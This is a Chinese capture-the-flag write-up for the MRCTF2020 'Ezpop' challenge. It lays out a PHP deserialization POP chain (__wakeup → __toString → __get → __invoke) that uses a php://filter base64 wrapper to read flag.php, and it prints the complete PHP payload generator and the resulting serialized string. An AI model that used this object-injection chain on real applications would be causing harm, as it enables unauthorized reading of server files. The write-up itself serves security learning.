[MRCTF2020]Ezpop1

打卡题目

代码审计

果我们把modifiy对象的var改为php伪协议，然后成功调用invoke魔术方法就可以读出flag

调用invoke魔术方法需要将对象当做一个函数来使用，这样invoke方法就会自动调用

<?php
 
class Modifier {
    protected  $var = "php://filter/read=convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}
 
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source; 
    }
 
    public function __wakeup(){  
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
 
class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
 
    public function __get($key){
        echo "__get";
        $function = $this->p;
        return $function();
    }
}
$a = new Show();
$a->source=new Show('aaaa');
$a->source->str=new Test();
echo "this is:";
echo urlencode(serialize($a)); //这里urlencode是为了防止 protected 对象对结果造成影响。

运行结果

运行得到

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22aaaa%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

一看base64编码

解码

得到flag